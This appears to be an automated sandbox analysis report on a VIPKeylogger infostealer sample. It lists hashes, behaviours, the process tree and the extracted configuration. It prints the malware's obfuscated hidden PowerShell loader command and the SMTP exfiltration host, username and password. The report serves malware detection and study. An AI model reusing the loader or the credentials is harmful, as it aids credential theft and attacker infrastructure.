Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2024 16:06
Static task
static1
Behavioral task
behavioral1
Sample
125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Paraffinerer.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Paraffinerer.ps1
Resource
win10v2004-20241007-en
General
-
Target
125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
-
Size
859KB
-
MD5
47fd98348b7d314e4e9dae46e5f1e1a1
-
SHA1
cafe48404707e61235bfbe6646d8072af4298e21
-
SHA256
125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
-
SHA512
8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
-
SSDEEP
12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
Malware Config
Extracted
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1728 powershell.exe 1376 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 14 IoCs
flow pid Process 37 748 msiexec.exe 38 4644 msiexec.exe 40 4644 msiexec.exe 41 748 msiexec.exe 43 4644 msiexec.exe 44 748 msiexec.exe 46 4644 msiexec.exe 47 748 msiexec.exe 49 4644 msiexec.exe 50 748 msiexec.exe 55 748 msiexec.exe 57 748 msiexec.exe 60 748 msiexec.exe 64 748 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 37 drive.google.com 38 drive.google.com 36 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 4644 msiexec.exe 748 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1728 powershell.exe 1376 powershell.exe 748 msiexec.exe 4644 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1572 4644 WerFault.exe 94 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1728 powershell.exe 1728 powershell.exe 1376 powershell.exe 1376 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1376 powershell.exe 1376 powershell.exe 1376 powershell.exe 1376 powershell.exe 1728 powershell.exe 1376 powershell.exe 748 msiexec.exe 748 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1728 powershell.exe 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeIncreaseQuotaPrivilege 1728 powershell.exe Token: SeSecurityPrivilege 1728 powershell.exe Token: SeTakeOwnershipPrivilege 1728 powershell.exe Token: SeLoadDriverPrivilege 1728 powershell.exe Token: SeSystemProfilePrivilege 1728 powershell.exe Token: SeSystemtimePrivilege 1728 powershell.exe Token: SeProfSingleProcessPrivilege 1728 powershell.exe Token: SeIncBasePriorityPrivilege 1728 powershell.exe Token: SeCreatePagefilePrivilege 1728 powershell.exe Token: SeBackupPrivilege 1728 powershell.exe Token: SeRestorePrivilege 1728 powershell.exe Token: SeShutdownPrivilege 1728 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeSystemEnvironmentPrivilege 1728 powershell.exe Token: SeRemoteShutdownPrivilege 1728 powershell.exe Token: SeUndockPrivilege 1728 powershell.exe Token: SeManageVolumePrivilege 1728 powershell.exe Token: 33 1728 powershell.exe Token: 34 1728 powershell.exe Token: 35 1728 powershell.exe Token: 36 1728 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe Token: SeRemoteShutdownPrivilege 1376 powershell.exe Token: SeUndockPrivilege 1376 powershell.exe Token: SeManageVolumePrivilege 1376 powershell.exe Token: 33 1376 powershell.exe Token: 34 1376 powershell.exe Token: 35 1376 powershell.exe Token: 36 1376 powershell.exe Token: SeDebugPrivilege 748 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4948 wrote to memory of 1728 4948 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe 83 PID 4948 wrote to memory of 1728 4948 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe 83 PID 4948 wrote to memory of 1728 4948 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe 83 PID 4948 wrote to memory of 1376 4948 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe 85 PID 4948 wrote to memory of 1376 4948 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe 85 PID 4948 wrote to memory of 1376 4948 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe 85 PID 1728 wrote to memory of 4644 1728 powershell.exe 94 PID 1728 wrote to memory of 4644 1728 powershell.exe 94 PID 1728 wrote to memory of 4644 1728 powershell.exe 94 PID 1728 wrote to memory of 4644 1728 powershell.exe 94 PID 1376 wrote to memory of 748 1376 powershell.exe 95 PID 1376 wrote to memory of 748 1376 powershell.exe 95 PID 1376 wrote to memory of 748 1376 powershell.exe 95 PID 1376 wrote to memory of 748 1376 powershell.exe 95 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe"C:\Users\Admin\AppData\Local\Temp\125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 16484⤵
- Program crash
PID:1572
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:748
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4644 -ip 46441⤵PID:1868
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5088d20c82658eef1be809a469818581c
SHA165bfd418b78ab4377f01190777a927cba52d0b22
SHA25693875d306db3166550ff3d7bba6f9389b6bd24c0d21209b135bcd7186a0e0828
SHA51271c73ad59cbfb8b41aa6473cb67665251585beb3a44fdfa1d1b09ed81ebd96705e9fb3b274d8b5b01ea49b2c5b0ea6280704fa2b520137f14131833836f76247
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0
Filesize471B
MD5f37dbfcbf1830fac18f80eb21b3ade98
SHA1e578fedc38c9c14903ce91a63e9f003d71a0702f
SHA2562ed9f20e1926124ff2136b1b84aa7894483e423f54952fa44d30e2ec3d8091b1
SHA51278fe08c3eefc803c81d86442a698bfb02a5e0b73d9baeb29c5074dca06ccab6ba3c6d0fbe822524c730261dfa3abee991ea62c6fefb41aa8ab3140ffcc00d756
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_BB4872F70FE9CD99D6AAFAAAA12FAF2E
Filesize472B
MD5fa4734f680f1131f6a5bf2779c41fe5f
SHA13e20ebc4cdc0b9f4f150860e99a5e3c1c5cc6f07
SHA256f51c86734c729964f753d41bcf9d700440db3016910449fabbd1f8140bb376ec
SHA512baf5cad957a1a3243719a8268cd60e3bc31f428b6f01492497b8449d7590b1152285ad05e773fd3907d06bfe21262561c3c5fc0005e6f5f8ab959f3e21179935
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5463b95a7ad66db9dcc7b68e589a2f5b0
SHA1ee41ccd732eb55df634ad22a321a3b4c6ae265d5
SHA256b15473d91e74d0b8bd8e7319df9695427840b91edcdddd050ca69e9b3339583d
SHA5121869bc795a51d038f5714996dad374e06ab2df6c263f9047fdbca5023fa33a54f7aea785db3d4cc54cdcfc44d2497076994da2a3ad24d00b75cdd2a9ee519060
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD57fd10707beb3296972de8a6e6f7686fe
SHA11772f200560cc832e185ab0f9b2b22d4520f999d
SHA256e2e11cfce152d845005e87385e2570194175592e651f3b05f77380c56a0ffec2
SHA512ab7e36410d688248e6494cabf9309615aa947876c0d1eb05129760f51cd12aa0cceb8d7086ff885874d1575ee29833792f156f99a695e8a1c669171636157153
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0
Filesize402B
MD5ad1bef5dbf5d400660875864d0cc3a75
SHA1582a4536eb60c29ee3ddaa352bd987546338bf9d
SHA2567ba7f648aac7d663c65958752521b78c0f32bd068da459c47d60219a8f75c97e
SHA5121884fe6386ed1513b286f4edda9fcdc7dd0c08368eb57436fa5e054eaeb61aeb4ee248f7fcda2ab391b989a6bc261bd8796dde93c7127a51d8c5faec1d80be54
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_BB4872F70FE9CD99D6AAFAAAA12FAF2E
Filesize398B
MD5da648d070fb165d36ad84224efa34ec8
SHA148a2288cda30de767a3e94cced195f3dfae54636
SHA256d112809b5c70e7290f44c1ece8b500087450a51e424a1b34d1e713974a957945
SHA512da401793050bda1f0f455d123b3e098d187b3f53298d1a46fdb622aa003c09815794bafb1e733f21846ba77f4f2d864f703842e827f41c673922c8e112f3da19
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
319KB
MD50333fb2b0e19a85944c9ea2538f15529
SHA1cb7cf6aef6b3409205b0efa337eb5fc4f84fa237
SHA2563529ab40264cb6806cb5ed7e64d98d29b94362987720cd633e4785f41e0163e2
SHA5125fa5102e95fb393e47fea92d7cee9b0f66bfaa94ec0cace06a83bd18413eb9d7968e6973a8843aeb7f9b877418a11e3686f61d326569392ae3e6cb65cc51ea5e
-
Filesize
53KB
MD56f2c225ff02a35f64c6157286f9e90b1
SHA1fdfb286088fd3cb3c3fa39f39e2e7ba48b3c6624
SHA2560f4caa809a6b9ad70a305958af34e60b82f3080bbb7067f316ca85702ffba443
SHA512c5fb4eafb4c29b774648bcec26736ad0808815d10618c95b723de9296240e6f9cbc35e90cc4439266f013810f16dde0f44a840fa928d8be2a8562cc5ac8d2eb5